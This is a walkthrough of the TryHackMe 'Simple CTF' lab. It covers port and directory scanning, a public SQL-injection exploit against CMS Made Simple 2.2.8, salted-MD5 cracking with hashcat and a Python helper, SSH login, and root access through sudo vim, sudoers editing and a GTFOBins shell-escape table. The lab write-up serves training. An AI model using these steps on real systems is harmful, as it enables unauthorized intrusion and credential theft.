TryHackMe - Simple CTF - Walkthrough

#ctf #hacking #tryhackme

This is one of the easier machines on TryHackMe, and it’s a guided CTF. Here I show the write-up of how the machine was solved; I won’t include the answers to the room’s questions, just the process.

Link to the machine: https://tryhackme.com/room/easyctf

Reconnaissance

A full-port service/version scan is run against the machine with nmap. Note that -T5 combined with --min-rate 50000 is very aggressive; over the TryHackMe VPN it can drop probes and miss ports, so if a port you expect is absent, rerun at a lower rate.

sudo nmap 10.10.124.41 -sSV -p- -T5 --min-rate 50000 -Pn -n
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-04 06:35 CEST
Nmap scan report for 10.10.124.41
Host is up (0.054s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.78 seconds

Three services are detected: FTP (vsftpd 3.0.3) on port 21, HTTP (Apache httpd 2.4.18) on port 80, and SSH (OpenSSH 7.2p2) on the non-standard port 2222.

Under normal circumstances, the proper approach would be to review each service version and search for known vulnerabilities and public exploits; this machine, however, is designed to guide you along the way.
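The "review each service version" step is easy to script. The following is an added example, not code from the original write-up: it parses the port table of nmap's normal output (the scan above is embedded as constructed sample input), flags services running off their usual port, and builds the "product version" strings you would feed into a CVE or exploit search. The DEFAULT_PORTS table is a hand-picked subset, not a complete service list.

```python
import re

# Constructed sample input: the port table from the nmap -sSV scan above,
# embedded here so the parser runs offline.
NMAP_OUTPUT = """\
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One nmap "normal output" port line: <port>/<proto> <state> <service> [version...]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Usual ports for a few services (hand-picked subset); anything else is "non-standard".
DEFAULT_PORTS = {"ftp": 21, "ssh": 22, "http": 80, "https": 443}


def parse_nmap_services(text):
    """Return one dict per port line found in nmap -sV normal output."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # header, "Service Info:", blank lines
        port, proto, state, name, version = m.groups()
        services.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": name,
            "version": (version or "").strip(),
        })
    return services


def product_version(version_field):
    """Split 'Apache httpd 2.4.18 ((Ubuntu))' into ('Apache httpd', '2.4.18').

    The version number is taken to be the first token containing a digit;
    everything before it is the product name, everything after it is ignored.
    """
    tokens = version_field.split()
    for i, tok in enumerate(tokens):
        if re.search(r"\d", tok):
            return " ".join(tokens[:i]), tok
    return version_field, ""


def open_services(text):
    return [s for s in parse_nmap_services(text) if s["state"] == "open"]


def nonstandard_ports(text):
    """Open services running on a port other than their usual one (ssh on 2222 here)."""
    return [s for s in open_services(text)
            if s["service"] in DEFAULT_PORTS
            and s["port"] != DEFAULT_PORTS[s["service"]]]


def search_terms(text):
    """'<product> <version>' strings to look up in a CVE or exploit database."""
    terms = []
    for s in open_services(text):
        product, version = product_version(s["version"])
        if product and version:
            terms.append("%s %s" % (product, version))
    return terms


if __name__ == "__main__":
    for term in search_terms(NMAP_OUTPUT):
        print(term)
    for s in nonstandard_ports(NMAP_OUTPUT):
        print("non-standard port: %s on %d" % (s["service"], s["port"]))
```

The regex deliberately captures the state as a free token, so "open|filtered" and "closed" lines are kept too and can be filtered later; only truly open services are turned into search terms.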

We visit the URL “http://machine_ip/” and find a default Apache page.

Discovery with Gobuster

gobuster dir -u "http://10.10.124.41/" -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.124.41/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 291]
/.htaccess            (Status: 403) [Size: 296]
/.htpasswd            (Status: 403) [Size: 296]
/index.html           (Status: 200) [Size: 11321]
/robots.txt           (Status: 200) [Size: 929]
/server-status        (Status: 403) [Size: 300]
/simple               (Status: 301) [Size: 313] [--> http://10.10.124.41/simple/]
Progress: 4746 / 4747 (99.98%)
===============================================================
Finished
===============================================================

In the /simple directory there is a CMS installed, “CMS Made Simple”, and its page footer reveals the exact version:

This site is powered by CMS Made Simple version 2.2.8

A second directory enumeration is run against /simple/, which reveals the admin panel (/simple/admin/) among other directories; that is interesting for brute-force or SQL injection attacks…

gobuster dir -u "http://10.10.124.41/simple/" -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.124.41/simple/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 303]
/.hta                 (Status: 403) [Size: 298]
/admin                (Status: 301) [Size: 319] [--> http://10.10.124.41/simple/admin/]
/assets               (Status: 301) [Size: 320] [--> http://10.10.124.41/simple/assets/]
/doc                  (Status: 301) [Size: 317] [--> http://10.10.124.41/simple/doc/]
/index.php            (Status: 200) [Size: 19913]
/lib                  (Status: 301) [Size: 317] [--> http://10.10.124.41/simple/lib/]
/modules              (Status: 301) [Size: 321] [--> http://10.10.124.41/simple/modules/]
/tmp                  (Status: 301) [Size: 317] [--> http://10.10.124.41/simple/tmp/]
/uploads              (Status: 301) [Size: 321] [--> http://10.10.124.41/simple/uploads/]
Progress: 4746 / 4747 (99.98%)
===============================================================
Finished

Exploit

After researching the CMS and its version, a known CVE and a public exploit (the Python script 46635.py used below) are found at the following links:

We proceed to download the Python script and get it running. The first thing I notice is that the script is written in Python 2, while nowadays Python 3 is used (and it’s the one I have installed).

python 46635.py -u "http://10.10.124.41/simple/"
  File "/home/jade/thm/simplectf/46635.py", line 25
    print "[+] Specify an url target"
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?

The error confirms the script is written for Python 2: print was a statement there and became a function in Python 3, so Python 3 rejects the bare print "..." form.

Two options: either port the script to Python 3 (with AI or by hand), or run it under Python 2.

I went with the second option.

In my case, I’m using Arch Linux and had to install the following packages:

sudo pacman -Sy python2 python2-requests python2-termcolor

We run the script:

python 46635.py -u "http://10.10.124.41/simple/"

#result
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96

We now have the salt and the password hash (not the password itself). The script offers to crack the hash with a dictionary, but in testing it did not do so correctly.

After some attempts with John The Ripper using different formats… it just wouldn’t work.

So I decided to use hashcat, knowing that the hash is MD5: CMS Made Simple stores md5(salt + password), which is hashcat mode 20, md5($salt.$pass), with each line of the hash file in hash:salt form.

echo "0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2" > hash.txt

hashcat -m 20 -a 0 hash.txt ../rockyou.txt

And the password is: ‘secret’
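To see exactly what hashcat mode 20 computes, here is an added example (not code from the original write-up) that reproduces the salted-MD5 check in Python. It takes the salt and hash recovered above, a constructed mini wordlist standing in for rockyou.txt, normalises stray upper-case hex digits (like the typo that can creep into a hand-typed hash), and also shows that the reversed order md5($pass.$salt), hashcat mode 10, would never match.

```python
import hashlib

# Salt and hash recovered by the exploit script above.
SALT = "1dac0d92e9fa6bb2"
TARGET_HASH = "0c01f4468bd75d7a84c7eb73846e8d96"

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "letmein", "qwerty", "secret", "mitch"]


def salted_md5(salt, password):
    """hashcat -m 20, md5($salt.$pass): the salt goes first, then the password."""
    return hashlib.md5((salt + password).encode("utf-8")).hexdigest()


def md5_pass_salt(salt, password):
    """hashcat -m 10, md5($pass.$salt): same ingredients, other order.

    Included only to show that picking the wrong mode silently finds nothing.
    """
    return hashlib.md5((password + salt).encode("utf-8")).hexdigest()


def normalize_digest(hex_digest):
    """Lower-case the digest and reject anything that is not 32 hex characters.

    A stray capital letter in a hand-typed hash is harmless after this.
    """
    digest = hex_digest.strip().lower()
    if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("not a 32-character hex MD5 digest: %r" % hex_digest)
    return digest


def crack(target_hex, salt, wordlist, hashfn=salted_md5):
    """Return the first wordlist entry whose salted hash matches, else None."""
    target = normalize_digest(target_hex)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")  # real wordlist files carry newlines
        if hashfn(salt, candidate) == target:
            return candidate
    return None


def hashcat_line(target_hex, salt):
    """The hash:salt line that hashcat -m 20 expects in hash.txt."""
    return "%s:%s" % (normalize_digest(target_hex), salt)


if __name__ == "__main__":
    print(hashcat_line(TARGET_HASH, SALT))
    print(crack(TARGET_HASH, SALT, WORDLIST))
```

Run as a script it prints the hash.txt line used above and, if the salt and hash transcribed above are exact, the same result hashcat found. For a real wordlist, replace WORDLIST with open("rockyou.txt", encoding="latin-1"), which streams the file line by line; hashcat is of course far faster, the point here is only to make the mode choice concrete.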

Another approach would have been to brute-force SSH on port 2222 with hydra using the username mitch, at the cost of being far noisier than cracking the hash offline.

We now have credentials. We check the CMS backend at http://10.10.124.41/simple/admin/login.php but don’t find anything interesting.

We log in via SSH on port 2222. Keep in mind that ssh defaults to port 22, so the port has to be given explicitly with -p 2222; without it the connection will fail.

Privilege Escalation

For privilege escalation I needed some help from here: https://derek-toohey19.medium.com/tryhackme-simple-ctf-walkthrough-bd05cca1073f

I don’t have the privilege escalation part well practiced yet…

We switch to a bash shell for a better interactive experience and check what sudo allows us to run.

mitch@Machine:~$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

vim can run arbitrary shell commands from its command line (:!command), and here it can be run as root through sudo without a password, so anything launched from inside it also runs as root.
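Reading sudo -l output by eye is fine for one rule, but it is worth having a small triage helper. The following is an added example, not code from the original write-up or from the room: it parses the sudo -l listing (the output seen above, plus two constructed extra lines to exercise the parser) into (runas, tags, command) entries and cross-checks the binaries against a hand-picked subset of the shell escapes catalogued by GTFOBins. The SHELL_ESCAPES table is deliberately small and is an assumption of this example, not a complete list.

```python
import re

# Constructed sample: the sudo -l output seen on the box, plus two extra
# rules (password-required less/id) added only to exercise the parser.
SUDO_L_OUTPUT = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/less, /usr/bin/id
"""

# Binaries that can spawn a shell or run commands from inside; a small,
# well-known subset of GTFOBins entries, not an exhaustive list.
SHELL_ESCAPES = {
    "vim": ":!/bin/sh  (or: sudo vim -c ':!/bin/sh')",
    "vi": ":!/bin/sh",
    "less": "!/bin/sh",
    "more": "!/bin/sh",
    "find": "find . -exec /bin/sh \\; -quit",
    "awk": "awk 'BEGIN {system(\"/bin/sh\")}'",
}

# One rule line: "(runas) [TAG: ...] /path/one, /path/two"
RULE = re.compile(r"^\(([^)]+)\)\s*((?:[A-Z]+:\s*)*)(.+)$")


def parse_sudo_l(text):
    """Return a list of (runas, tags, command) tuples from sudo -l output.

    Only lines after the "User X may run the following commands" header are
    considered, so the Defaults block is ignored.
    """
    rules = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = RULE.match(line.strip())
        if not m:
            continue
        runas, tagstr, commands = m.groups()
        tags = [t.rstrip(":") for t in tagstr.split()]
        for cmd in commands.split(","):
            rules.append((runas.strip(), tags, cmd.strip()))
    return rules


def triage(text):
    """Rules that likely yield a root shell: runas root/ALL and a binary with a
    known escape. NOPASSWD rules are sorted first because they need nothing else."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        runas_user = runas.split(":")[0].strip()
        if binary in SHELL_ESCAPES and runas_user in ("root", "ALL"):
            findings.append({
                "command": cmd,
                "runas": runas_user,
                "nopasswd": "NOPASSWD" in tags,
                "escape": SHELL_ESCAPES[binary],
            })
    findings.sort(key=lambda f: not f["nopasswd"])
    return findings


if __name__ == "__main__":
    for f in triage(SUDO_L_OUTPUT):
        flag = "NOPASSWD" if f["nopasswd"] else "password"
        print("%-20s (%s, %s): %s" % (f["command"], f["runas"], flag, f["escape"]))
```

On this box the helper reports the vim rule as the NOPASSWD finding, and the listed escape shows the shortest path: inside sudo vim, :!/bin/sh drops straight into a root shell, with no need to touch /etc/sudoers at all. Editing sudoers as the write-up does also works, but leaves a permanent change on the target.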

The simplest method I found to escalate privileges is to do the following:

sudo vim

#inside vim
:!visudo

#Add the following
mitch ALL=(ALL:ALL) ALL

# Save and exit

This gives the user mitch the right to run any command through sudo as any user. The new rule has no NOPASSWD tag, so sudo will ask for mitch’s password, which we already have.

sudo su

#PWN3D